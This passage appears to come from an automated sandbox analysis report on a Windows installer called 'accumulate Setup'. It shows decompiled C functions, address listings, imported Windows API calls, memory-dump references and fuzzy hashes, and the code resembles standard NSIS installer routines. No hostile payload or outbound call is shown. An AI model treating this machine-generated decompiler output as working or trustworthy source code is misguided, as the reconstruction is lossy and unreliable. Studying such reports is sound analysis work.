								E004041B0(_v8);
								goto L23;
							} else {
								ShowWindow(_v12, 5);
								E004041B0(_v12);
								L93:
								return E004041E2(_a8, _a12, _a16);
							}
						}
						goto L19;
					}
				}
			}


























































                                                          0x00404b9e
                                                          0x00404ba6
                                                          0x00404bae
                                                          0x00404bb4
                                                          0x00404bcc
                                                          0x00404bcf
                                                          0x00404bd0
                                                          0x00404dfd
                                                          0x00404e04
                                                          0x00404e18
                                                          0x00404e06
                                                          0x00404e08
                                                          0x00404e0b
                                                          0x00404e0c
                                                          0x00404e13
                                                          0x00404e13
                                                          0x00404e24
                                                          0x00404e32
                                                          0x00404e35
                                                          0x00404e4b
                                                          0x00404ec0
                                                          0x00404ec3
                                                          0x00404ec5
                                                          0x00404ecf
                                                          0x00404edd
                                                          0x00404edd
                                                          0x00404edf
                                                          0x00404ee9
                                                          0x00404eef
                                                          0x00404ef2
                                                          0x00404ef5
                                                          0x00404f10
                                                          0x00404ef7
                                                          0x00404f01
                                                          0x00404f01
                                                          0x00404ef5
                                                          0x00404ee9
                                                          0x00000000
                                                          0x00404ec3
                                                          0x00404e50
                                                          0x00404e5b
                                                          0x00404e60
                                                          0x00404e67
                                                          0x00404e6c
                                                          0x00404e70
                                                          0x00404e7b
                                                          0x00404e7b
                                                          0x00404e7f
                                                          0x00404e83
                                                          0x00404e87
                                                          0x00404e9a
                                                          0x00404e89
                                                          0x00404e89
                                                          0x00404e90
                                                          0x00404e96
                                                          0x00404e92
                                                          0x00404e92
                                                          0x00404e92
                                                          0x00404e90
                                                          0x00404e9e
                                                          0x00404ea0
                                                          0x00404eb3
                                                          0x00404eb6
                                                          0x00404eb9
                                                          0x00404eb9
                                                          0x00404e83
                                                          0x00000000
                                                          0x00404e70
                                                          0x00404e52
                                                          0x00404e59
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00404f13
                                                          0x00404f13
                                                          0x00404f1a
                                                          0x00404f8b
                                                          0x00404f93
                                                          0x00404f9b
                                                          0x00404f9b
                                                          0x00404fa4
                                                          0x00404fa6
                                                          0x00404fad
                                                          0x00404fb0
                                                          0x00404fb0
                                                          0x00404fb6
                                                          0x00404fbd
                                                          0x00404fc0
                                                          0x00404fc0
                                                          0x00404fc6
                                                          0x00404fcc
                                                          0x00404fd2
                                                          0x00404fd2
                                                          0x00404fdf
                                                          0x0040513f
                                                          0x00405146
                                                          0x00405163
                                                          0x00405169
                                                          0x0040517b
                                                          0x0040517b
                                                          0x00000000
                                                          0x00404fe5
                                                          0x00404fe7
                                                          0x00404fec
                                                          0x00404ff1
                                                          0x00404ff6
                                                          0x00404ff8
                                                          0x00404ff8
                                                          0x00404ff9
                                                          0x00404ffa
                                                          0x00404ffc
                                                          0x00404ffc
                                                          0x00405004
                                                          0x00405045
                                                          0x00405047
                                                          0x00405057
                                                          0x0040505a
                                                          0x0040505f
                                                          0x00405066
                                                          0x00405069
                                                          0x0040510b
                                                          0x00405113
                                                          0x0040511b
                                                          0x0040511b
                                                          0x00405121
                                                          0x00405129
                                                          0x0040513a
                                                          0x0040513a
                                                          0x00000000
                                                          0x00405129
                                                          0x0040506f
                                                          0x00405072
                                                          0x00405078
                                                          0x0040507d
                                                          0x0040507f
                                                          0x00405081
                                                          0x00405087
                                                          0x0040508e
                                                          0x00405093
                                                          0x0040509a
                                                          0x0040509d
                                                          0x0040509d
                                                          0x004050a4
                                                          0x004050b0
                                                          0x004050b4
                                                          0x004050b6
                                                          0x004050b6
                                                          0x004050a6
                                                          0x004050a8
                                                          0x004050a8
                                                          0x004050d6
                                                          0x004050e2
                                                          0x004050f1
                                                          0x004050f1
                                                          0x004050f3
                                                          0x004050f6
                                                          0x004050ff
                                                          0x00000000
                                                          0x00405006
                                                          0x00405011
                                                          0x00405014
                                                          0x00405019
                                                          0x0040501b
                                                          0x0040501f
                                                          0x0040502f
                                                          0x00405039
                                                          0x0040503b
                                                          0x0040503e
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00405021
                                                          0x00405021
                                                          0x00405027
                                                          0x00405029
                                                          0x00405029
                                                          0x0040502a
                                                          0x0040502b
                                                          0x00000000
                                                          0x00405021
                                                          0x00405004
                                                          0x00404fdf
                                                          0x00404f22
                                                          0x00000000
                                                          0x00404f38
                                                          0x00404f42
                                                          0x00404f47
                                                          0x00000000
                                                          0x00000000
                                                          0x00404f59
                                                          0x00404f5e
                                                          0x00404f6a
                                                          0x00404f6a
                                                          0x00404f6c
                                                          0x00404f7b
                                                          0x00404f7d
                                                          0x00404f81
                                                          0x00404f84
                                                          0x00000000
                                                          0x00404f84
                                                          0x00404f22
                                                          0x00404bd6
                                                          0x00404bd9
                                                          0x00404bdc
                                                          0x00404bec
                                                          0x00404bff
                                                          0x00404c0a
                                                          0x00404c10
                                                          0x00404c1e
                                                          0x00404c31
                                                          0x00404c36
                                                          0x00404c41
                                                          0x00404c4a
                                                          0x00404c60
                                                          0x00404c70
                                                          0x00404c7c
                                                          0x00404c7c
                                                          0x00404c81
                                                          0x00404c87
                                                          0x00404c89
                                                          0x00404c8c
                                                          0x00404c91
                                                          0x00404c96
                                                          0x00404c98
                                                          0x00404c98
                                                          0x00404cb8
                                                          0x00404cb8
                                                          0x00404cba
                                                          0x00404cbb
                                                          0x00404cc0
                                                          0x00404cc6
                                                          0x00404cca
                                                          0x00404ccf
                                                          0x00404cd7
                                                          0x00404cdb
                                                          0x00404ce0
                                                          0x00404ce5
                                                          0x00404ced
                                                          0x00404cf0
                                                          0x00404dbf
                                                          0x00404dd2
                                                          0x00000000
                                                          0x00404cf6
                                                          0x00404cf9
                                                          0x00404cfc
                                                          0x00404cff
                                                          0x00404cff
                                                          0x00404d04
                                                          0x00404d0d
                                                          0x00404d10
                                                          0x00404d14
                                                          0x00404d17
                                                          0x00404d1a
                                                          0x00404d23
                                                          0x00404d2c
                                                          0x00404d2f
                                                          0x00404d32
                                                          0x00404d35
                                                          0x00404d73
                                                          0x00404d9e
                                                          0x00404d75
                                                          0x00404d84
                                                          0x00404d84
                                                          0x00404d37
                                                          0x00404d3a
                                                          0x00404d48
                                                          0x00404d52
                                                          0x00404d5a
                                                          0x00404d61
                                                          0x00404d6c
                                                          0x00404d6c
                                                          0x00404d35
                                                          0x00404da4
                                                          0x00404da5
                                                          0x00404db1
                                                          0x00404db1
                                                          0x00404dbd
                                                          0x00404dd8
                                                          0x00404ddb
                                                          0x00404df8
                                                          0x00000000
                                                          0x00404ddd
                                                          0x00404de2
                                                          0x00404deb
                                                          0x0040517d
                                                          0x0040518f
                                                          0x0040518f
                                                          0x00404ddb
                                                          0x00000000
                                                          0x00404dbd
                                                          0x00404cf0

                                                          APIs
                                                          • GetDlgItem.USER32 ref: 00404B97
                                                          • GetDlgItem.USER32 ref: 00404BA4
                                                          • GlobalAlloc.KERNEL32(00000040,?), ref: 00404BF3
                                                          • LoadImageA.USER32 ref: 00404C0A
                                                          • SetWindowLongA.USER32 ref: 00404C24
                                                          • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404C36
                                                          • ImageList_AddMasked.COMCTL32(00000000,00000110,00FF00FF), ref: 00404C4A
                                                          • SendMessageA.USER32(?,00001109,00000002), ref: 00404C60
                                                          • SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 00404C6C
                                                          • SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 00404C7C
                                                          • DeleteObject.GDI32(00000110), ref: 00404C81
                                                          • SendMessageA.USER32(?,00000143,00000000,00000000), ref: 00404CAC
                                                          • SendMessageA.USER32(?,00000151,00000000,00000000), ref: 00404CB8
                                                          • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404D52
                                                          • SendMessageA.USER32(?,0000110A,00000003,00000110), ref: 00404D82
                                                            • Part of subcall function 004041B0: SendMessageA.USER32(00000028,?,00000001,00403FE0), ref: 004041BE
                                                          • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404D96
                                                          • GetWindowLongA.USER32 ref: 00404DC4
                                                          • SetWindowLongA.USER32 ref: 00404DD2
                                                          • ShowWindow.USER32(?,00000005), ref: 00404DE2
                                                          • SendMessageA.USER32(?,00000419,00000000,?), ref: 00404EDD
                                                          • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00404F42
                                                          • SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00404F57
                                                          • SendMessageA.USER32(?,00000420,00000000,00000020), ref: 00404F7B
                                                          • SendMessageA.USER32(?,00000200,00000000,00000000), ref: 00404F9B
                                                          • ImageList_Destroy.COMCTL32(?), ref: 00404FB0
                                                          • GlobalFree.KERNEL32 ref: 00404FC0
                                                          • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00405039
                                                          • SendMessageA.USER32(?,00001102,?,?), ref: 004050E2
                                                          • SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 004050F1
                                                          • InvalidateRect.USER32(?,00000000,00000001), ref: 0040511B
                                                          • ShowWindow.USER32(?,00000000), ref: 00405169
                                                          • GetDlgItem.USER32 ref: 00405174
                                                          • ShowWindow.USER32(00000000), ref: 0040517B
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.220754065.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.220747343.0000000000400000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220765903.0000000000408000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220771442.000000000040A000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220783231.0000000000415000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220812028.000000000042C000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220825040.0000000000435000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220833630.0000000000438000.00000002.00020000.sdmp Download File
                                                          Similarity
                                                          • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                          • String ID: $M$N
                                                          • API String ID: 2564846305-813528018
                                                          • Opcode ID: 05a311050dda4b414fd1261923b8e6b7691581466e425b0fd9ae4ea99a1d7fb6
                                                          • Instruction ID: 99b70255f3faedab1c4ad885451b662392dfc0d6b29454a89b749d4faaca394f
                                                          • Opcode Fuzzy Hash: 05a311050dda4b414fd1261923b8e6b7691581466e425b0fd9ae4ea99a1d7fb6
                                                          • Instruction Fuzzy Hash: 5D027DB0A00209AFDB20DF94DD85AAE7BB5FB44354F50813AF610BA2E0D7798D52CF58
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 004042E6, Relevance: 37.0, APIs: 19, Strings: 2, Instructions: 202windowstringCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 91%
                                                          			E004042E6(struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, int _a16) {
				intOrPtr _v8;
				signed int _v12;
				void* _v16;
				struct HWND__* _t52;
				long _t86;
				int _t98;
				struct HWND__* _t99;
				signed int _t100;
				intOrPtr _t107;
				intOrPtr _t109;
				int _t110;
				signed int* _t112;
				signed int _t113;
				char* _t114;
				CHAR* _t115;

				if(_a8 != 0x110) {
					if(_a8 != 0x111) {
						L11:
						if(_a8 != 0x4e) {
							if(_a8 == 0x40b) {
								 *0x42985c =  *0x42985c + 1;
							}
							L25:
							_t110 = _a16;
							L26:
							return E004041E2(_a8, _a12, _t110);
						}
						_t52 = GetDlgItem(_a4, 0x3e8);
						_t110 = _a16;
						if( *((intOrPtr*)(_t110 + 8)) == 0x70b &&  *((intOrPtr*)(_t110 + 0xc)) == 0x201) {
							_t100 =  *((intOrPtr*)(_t110 + 0x1c));
							_t109 =  *((intOrPtr*)(_t110 + 0x18));
							_v12 = _t100;
							_v16 = _t109;
							_v8 = 0x42e3c0;
							if(_t100 - _t109 < 0x800) {
								SendMessageA(_t52, 0x44b, 0,  &_v16);
								SetCursor(LoadCursorA(0, 0x7f02));
								_push(1);
								E0040458A(_a4, _v8);
								SetCursor(LoadCursorA(0, 0x7f00));
								_t110 = _a16;
							}
						}
						if( *((intOrPtr*)(_t110 + 8)) != 0x700 ||  *((intOrPtr*)(_t110 + 0xc)) != 0x100) {
							goto L26;
						} else {
							if( *((intOrPtr*)(_t110 + 0x10)) == 0xd) {
								SendMessageA( *0x42f428, 0x111, 1, 0);
							}
							if( *((intOrPtr*)(_t110 + 0x10)) == 0x1b) {
								SendMessageA( *0x42f428, 0x10, 0, 0);
							}
							return 1;
						}
					}
					if(_a12 >> 0x10 != 0 ||  *0x42985c != 0) {
						goto L25;
					} else {
						_t112 =  *0x42a068 + 0x14;
						if(( *_t112 & 0x00000020) == 0) {
							goto L25;
						}
						 *_t112 =  *_t112 & 0xfffffffe | SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
						E0040419D(SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
						E00404566();
						goto L11;
					}
				}
				_t98 = _a16;
				_t113 =  *(_t98 + 0x30);
				if(_t113 < 0) {
					_t107 =  *0x42ebfc; // 0x569dca
					_t113 =  *(_t107 - 4 + _t113 * 4);
				}
				_push( *((intOrPtr*)(_t98 + 0x34)));
				_t114 = _t113 +  *0x42f478;
				_push(0x22);
				_a16 =  *_t114;
				_v12 = _v12 & 0x00000000;
				_t115 = _t114 + 1;
				_v16 = _t115;
				_v8 = E004042B1;
				E0040417B(_a4);
				_push( *((intOrPtr*)(_t98 + 0x38)));
				_push(0x23);
				E0040417B(_a4);
				CheckDlgButton(_a4, (0 | ( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
				E0040419D( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001);
				_t99 = GetDlgItem(_a4, 0x3e8);
				E004041B0(_t99);
				SendMessageA(_t99, 0x45b, 1, 0);
				_t86 =  *( *0x42f434 + 0x68);
				if(_t86 < 0) {
					_t86 = GetSysColor( ~_t86);
				}
				SendMessageA(_t99, 0x443, 0, _t86);
				SendMessageA(_t99, 0x445, 0, 0x4010000);
				SendMessageA(_t99, 0x435, 0, lstrlenA(_t115));
				 *0x42985c = 0;
				SendMessageA(_t99, 0x449, _a16,  &_v16);
				 *0x42985c = 0;
				return 0;
			}


















                                                          0x004042f6
                                                          0x0040441b
                                                          0x00404477
                                                          0x0040447b
                                                          0x00404548
                                                          0x0040454a
                                                          0x0040454a
                                                          0x00404550
                                                          0x00404550
                                                          0x00404553
                                                          0x00000000
                                                          0x0040455a
                                                          0x00404489
                                                          0x0040448b
                                                          0x00404495
                                                          0x004044a0
                                                          0x004044a3
                                                          0x004044a6
                                                          0x004044b1
                                                          0x004044b4
                                                          0x004044bb
                                                          0x004044c9
                                                          0x004044e1
                                                          0x004044e3
                                                          0x004044eb
                                                          0x004044fa
                                                          0x004044fc
                                                          0x004044fc
                                                          0x004044bb
                                                          0x00404506
                                                          0x00000000
                                                          0x00404511
                                                          0x00404515
                                                          0x00404526
                                                          0x00404526
                                                          0x0040452c
                                                          0x0040453a
                                                          0x0040453a
                                                          0x00000000
                                                          0x0040453e
                                                          0x00404506
                                                          0x00404426
                                                          0x00000000
                                                          0x0040443a
                                                          0x00404440
                                                          0x00404446
                                                          0x00000000
                                                          0x00000000
                                                          0x0040446b
                                                          0x0040446d
                                                          0x00404472
                                                          0x00000000
                                                          0x00404472
                                                          0x00404426
                                                          0x004042fc
                                                          0x004042ff
                                                          0x00404304
                                                          0x00404306
                                                          0x00404315
                                                          0x00404315
                                                          0x0040431c
                                                          0x0040431f
                                                          0x00404321
                                                          0x00404326
                                                          0x0040432f
                                                          0x00404335
                                                          0x00404341
                                                          0x00404344
                                                          0x0040434d
                                                          0x00404352
                                                          0x00404355
                                                          0x0040435a
                                                          0x00404371
                                                          0x00404378
                                                          0x0040438b
                                                          0x0040438e
                                                          0x004043a3
                                                          0x004043aa
                                                          0x004043af
                                                          0x004043b4
                                                          0x004043b4
                                                          0x004043c3
                                                          0x004043d2
                                                          0x004043e4
                                                          0x004043e9
                                                          0x004043f9
                                                          0x004043fb
                                                          0x00000000

                                                          APIs
                                                          • CheckDlgButton.USER32 ref: 00404371
                                                          • GetDlgItem.USER32 ref: 00404385
                                                          • SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 004043A3
                                                          • GetSysColor.USER32(?), ref: 004043B4
                                                          • SendMessageA.USER32(00000000,00000443,00000000,?), ref: 004043C3
                                                          • SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 004043D2
                                                          • lstrlenA.KERNEL32(?), ref: 004043D5
                                                          • SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 004043E4
                                                          • SendMessageA.USER32(00000000,00000449,?,00000110), ref: 004043F9
                                                          • GetDlgItem.USER32 ref: 0040445B
                                                          • SendMessageA.USER32(00000000), ref: 0040445E
                                                          • GetDlgItem.USER32 ref: 00404489
                                                          • SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 004044C9
                                                          • LoadCursorA.USER32 ref: 004044D8
                                                          • SetCursor.USER32(00000000), ref: 004044E1
                                                          • LoadCursorA.USER32 ref: 004044F7
                                                          • SetCursor.USER32(00000000), ref: 004044FA
                                                          • SendMessageA.USER32(00000111,00000001,00000000), ref: 00404526
                                                          • SendMessageA.USER32(00000010,00000000,00000000), ref: 0040453A
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.220754065.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.220747343.0000000000400000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220765903.0000000000408000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220771442.000000000040A000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220783231.0000000000415000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220812028.000000000042C000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220825040.0000000000435000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220833630.0000000000438000.00000002.00020000.sdmp Download File
                                                          Similarity
                                                          • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                          • String ID: GHFGHFGHFDGDFGDFg$N
                                                          • API String ID: 3103080414-2795107479
                                                          • Opcode ID: 745d5685d33c6010513eb6a6e6710873411dad37f80b0c9191fb1ce11dc8c820
                                                          • Instruction ID: 2ba0dcbd17e821031ba3c657239c4b48ae58aa12c0a6ed8defdb88479dfe25c9
                                                          • Opcode Fuzzy Hash: 745d5685d33c6010513eb6a6e6710873411dad37f80b0c9191fb1ce11dc8c820
                                                          • Instruction Fuzzy Hash: CC61C2B1A00209BFDF10AF61DD45F6A3B69EB94754F00803AFB04BA1D1C7B8A951CF98
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00401000, Relevance: 28.1, APIs: 14, Strings: 2, Instructions: 125COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 90%
                                                          			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
				struct tagLOGBRUSH _v16;
				struct tagRECT _v32;
				struct tagPAINTSTRUCT _v96;
				struct HDC__* _t70;
				struct HBRUSH__* _t87;
				struct HFONT__* _t94;
				long _t102;
				signed int _t126;
				struct HDC__* _t128;
				intOrPtr _t130;

				if(_a8 == 0xf) {
					_t130 =  *0x42f434;
					_t70 = BeginPaint(_a4,  &_v96);
					_v16.lbStyle = _v16.lbStyle & 0x00000000;
					_a8 = _t70;
					GetClientRect(_a4,  &_v32);
					_t126 = _v32.bottom;
					_v32.bottom = _v32.bottom & 0x00000000;
					while(_v32.top < _t126) {
						_a12 = _t126 - _v32.top;
						asm("cdq");
						asm("cdq");
						asm("cdq");
						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
						_t87 = CreateBrushIndirect( &_v16);
						_v32.bottom = _v32.bottom + 4;
						_a16 = _t87;
						FillRect(_a8,  &_v32, _t87);
						DeleteObject(_a16);
						_v32.top = _v32.top + 4;
					}
					if( *(_t130 + 0x58) != 0xffffffff) {
						_t94 = CreateFontIndirectA( *(_t130 + 0x34));
						_a16 = _t94;
						if(_t94 != 0) {
							_t128 = _a8;
							_v32.left = 0x10;
							_v32.top = 8;
							SetBkMode(_t128, 1);
							SetTextColor(_t128,  *(_t130 + 0x58));
							_a8 = SelectObject(_t128, _a16);
							DrawTextA(_t128, "accumulate Setup", 0xffffffff,  &_v32, 0x820);
							SelectObject(_t128, _a8);
							DeleteObject(_a16);
						}
					}
					EndPaint(_a4,  &_v96);
					return 0;
				}
				_t102 = _a16;
				if(_a8 == 0x46) {
					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
					 *((intOrPtr*)(_t102 + 4)) =  *0x42f428;
				}
				return DefWindowProcA(_a4, _a8, _a12, _t102);
			}













                                                          0x0040100a
                                                          0x00401039
                                                          0x00401047
                                                          0x0040104d
                                                          0x00401051
                                                          0x0040105b
                                                          0x00401061
                                                          0x00401064
                                                          0x004010f3
                                                          0x00401089
                                                          0x0040108c
                                                          0x004010a6
                                                          0x004010bd
                                                          0x004010cc
                                                          0x004010cf
                                                          0x004010d5
                                                          0x004010d9
                                                          0x004010e4
                                                          0x004010ed
                                                          0x004010ef
                                                          0x004010ef
                                                          0x00401100
                                                          0x00401105
                                                          0x0040110d
                                                          0x00401110
                                                          0x00401112
                                                          0x00401118
                                                          0x0040111f
                                                          0x00401126
                                                          0x00401130
                                                          0x00401142
                                                          0x00401156
                                                          0x00401160
                                                          0x00401165
                                                          0x00401165
                                                          0x00401110
                                                          0x0040116e
                                                          0x00000000
                                                          0x00401178
                                                          0x00401010
                                                          0x00401013
                                                          0x00401015
                                                          0x0040101f
                                                          0x0040101f
                                                          0x00000000

                                                          APIs
                                                          • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                                                          • BeginPaint.USER32(?,?), ref: 00401047
                                                          • GetClientRect.USER32 ref: 0040105B
                                                          • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                          • FillRect.USER32 ref: 004010E4
                                                          • DeleteObject.GDI32(?), ref: 004010ED
                                                          • CreateFontIndirectA.GDI32(?), ref: 00401105
                                                          • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                          • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                          • SelectObject.GDI32(00000000,?), ref: 00401140
                                                          • DrawTextA.USER32(00000000,accumulate Setup,000000FF,00000010,00000820), ref: 00401156
                                                          • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                          • DeleteObject.GDI32(?), ref: 00401165
                                                          • EndPaint.USER32(?,?), ref: 0040116E
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.220754065.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.220747343.0000000000400000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220765903.0000000000408000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220771442.000000000040A000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220783231.0000000000415000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220812028.000000000042C000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220825040.0000000000435000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220833630.0000000000438000.00000002.00020000.sdmp Download File
                                                          Similarity
                                                          • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                          • String ID: F$accumulate Setup
                                                          • API String ID: 941294808-1891751181
                                                          • Opcode ID: bb71a3ab4a4fa1f895d534f8b47170c1d9b9c824dc85430c64170ade6c4bb6c2
                                                          • Instruction ID: fc049dc8deed713fddbaab3278265d12b48f61153473f3c5d5e2d7be2f7e1970
                                                          • Opcode Fuzzy Hash: bb71a3ab4a4fa1f895d534f8b47170c1d9b9c824dc85430c64170ade6c4bb6c2
                                                          • Instruction Fuzzy Hash: 33417D71400249AFCF058FA5DE459AFBFB9FF44314F00802AF591AA1A0CB74D955DFA4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00405D66, Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 129memorystringCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E00405D66(void* __ecx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				long _t12;
				long _t24;
				char* _t31;
				int _t37;
				void* _t38;
				intOrPtr* _t39;
				long _t42;
				CHAR* _t44;
				void* _t46;
				void* _t48;
				void* _t49;
				void* _t52;
				void* _t53;

				_t38 = __ecx;
				_t44 =  *(_t52 + 0x14);
				 *0x42c620 = 0x4c554e;
				if(_t44 == 0) {
					L3:
					_t12 = GetShortPathNameA( *(_t52 + 0x1c), 0x42ca20, 0x400);
					if(_t12 != 0 && _t12 <= 0x400) {
						_t37 = wsprintfA(0x42c220, "%s=%s\r\n", 0x42c620, 0x42ca20);
						_t53 = _t52 + 0x10;
						E0040618A(_t37, 0x400, 0x42ca20, 0x42ca20,  *((intOrPtr*)( *0x42f434 + 0x128)));
						_t12 = E00405C90(0x42ca20, 0xc0000000, 4);
						_t48 = _t12;
						 *(_t53 + 0x18) = _t48;
						if(_t48 != 0xffffffff) {
							_t42 = GetFileSize(_t48, 0);
							_t6 = _t37 + 0xa; // 0xa
							_t46 = GlobalAlloc(0x40, _t42 + _t6);
							if(_t46 == 0 || E00405D08(_t48, _t46, _t42) == 0) {
								L18:
								return CloseHandle(_t48);
							} else {
								if(E00405BF5(_t38, _t46, "[Rename]\r\n") != 0) {
									_t49 = E00405BF5(_t38, _t21 + 0xa, 0x40a3d8);
									if(_t49 == 0) {
										_t48 =  *(_t53 + 0x18);
										L16:
										_t24 = _t42;
										L17:
										E00405C4B(_t24 + _t46, 0x42c220, _t37);
										SetFilePointer(_t48, 0, 0, 0);
										E00405D37(_t48, _t46, _t42 + _t37);
										GlobalFree(_t46);
										goto L18;
									}
									_t39 = _t46 + _t42;
									_t31 = _t39 + _t37;
									while(_t39 > _t49) {
										 *_t31 =  *_t39;
										_t31 = _t31 - 1;
										_t39 = _t39 - 1;
									}
									_t24 = _t49 - _t46 + 1;
									_t48 =  *(_t53 + 0x18);
									goto L17;
								}
								lstrcpyA(_t46 + _t42, "[Rename]\r\n");
								_t42 = _t42 + 0xa;
								goto L16;
							}
						}
					}
				} else {
					CloseHandle(E00405C90(_t44, 0, 1));
					_t12 = GetShortPathNameA(_t44, 0x42c620, 0x400);
					if(_t12 != 0 && _t12 <= 0x400) {
						goto L3;
					}
				}
				return _t12;
			}



















                                                          0x00405d66
                                                          0x00405d6f
                                                          0x00405d76
                                                          0x00405d8a
                                                          0x00405db2
                                                          0x00405dbd
                                                          0x00405dc1
                                                          0x00405de1
                                                          0x00405de8
                                                          0x00405df2
                                                          0x00405dff
                                                          0x00405e04
                                                          0x00405e09
                                                          0x00405e0d
                                                          0x00405e1c
                                                          0x00405e1e
                                                          0x00405e2b
                                                          0x00405e2f
                                                          0x00405eca
                                                          0x00000000
                                                          0x00405e45
                                                          0x00405e52
                                                          0x00405e76
                                                          0x00405e7a
                                                          0x00405e99
                                                          0x00405e9d
                                                          0x00405e9d
                                                          0x00405e9f
                                                          0x00405ea8
                                                          0x00405eb3
                                                          0x00405ebe
                                                          0x00405ec4
                                                          0x00000000
                                                          0x00405ec4
                                                          0x00405e7c
                                                          0x00405e7f
                                                          0x00405e8a
                                                          0x00405e86
                                                          0x00405e88
                                                          0x00405e89
                                                          0x00405e89
                                                          0x00405e91
                                                          0x00405e93
                                                          0x00000000
                                                          0x00405e93
                                                          0x00405e5d
                                                          0x00405e63
                                                          0x00000000
                                                          0x00405e63
                                                          0x00405e2f
                                                          0x00405e0d
                                                          0x00405d8c
                                                          0x00405d97
                                                          0x00405da0
                                                          0x00405da4
                                                          0x00000000
                                                          0x00000000
                                                          0x00405da4
                                                          0x00405ed5

                                                          APIs
                                                          • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,00000000,00405EF7,?,?), ref: 00405D97
                                                          • GetShortPathNameA.KERNEL32 ref: 00405DA0
                                                            • Part of subcall function 00405BF5: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405E50,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405C05
                                                            • Part of subcall function 00405BF5: lstrlenA.KERNEL32(00000000,?,00000000,00405E50,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405C37
                                                          • GetShortPathNameA.KERNEL32 ref: 00405DBD
                                                          • wsprintfA.USER32 ref: 00405DDB
                                                          • GetFileSize.KERNEL32(00000000,00000000,0042CA20,C0000000,00000004,0042CA20,?,?,?,?,?), ref: 00405E16
                                                          • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405E25
                                                          • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E5D
                                                          • SetFilePointer.KERNEL32(0040A3D8,00000000,00000000,00000000,00000000,0042C220,00000000,-0000000A,0040A3D8,00000000,[Rename],00000000,00000000,00000000), ref: 00405EB3
                                                          • GlobalFree.KERNEL32 ref: 00405EC4
